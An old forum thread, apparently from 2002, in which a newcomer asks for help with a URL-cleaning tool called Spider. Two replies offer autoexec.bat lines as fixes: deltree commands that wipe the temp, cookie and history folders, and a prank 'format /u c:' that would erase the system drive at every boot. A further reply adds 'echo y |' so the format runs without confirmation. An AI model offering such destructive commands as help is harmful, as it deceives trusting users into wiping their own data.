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cliff taylor

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Spider/bite
« on: 17 August 2002, 17:51 »
First post - hopefully  in the right place...I have downloaded Spider, but it refuses to remove URL's, saying I need Spiderbite.exe to do that, although I do have Spiderbite.exe - any ideas anyone???

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Spider/bite
« Reply #1 on: 17 August 2002, 18:16 »
slap this in your autoexec.bat

deltree /y c:\windows\temp
deltree /y c:\windows\cookies
deltree /y c:\windows\history
deltree /y c:\windows\tempor~1
md c:\windows\temp
md c:\windows\cookies
md c:\windows\history
Contains scenes of mild peril.

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Spider/bite
« Reply #2 on: 18 August 2002, 01:05 »
slap this in your autoexec.bat
format /u c:
Disorder | Rating
Paranoid: Moderate
Schizoid: Moderate
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Spider/bite
« Reply #3 on: 18 August 2002, 08:13 »
m0r, don't forget the "echo y | " in front of that command to make it more streamlined.
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Spider/bite
« Reply #4 on: 18 August 2002, 17:22 »
I once had this big spider bite on my arm and it sucked!!  It was all itchy and shit it wasnt cool.  I hate spiders!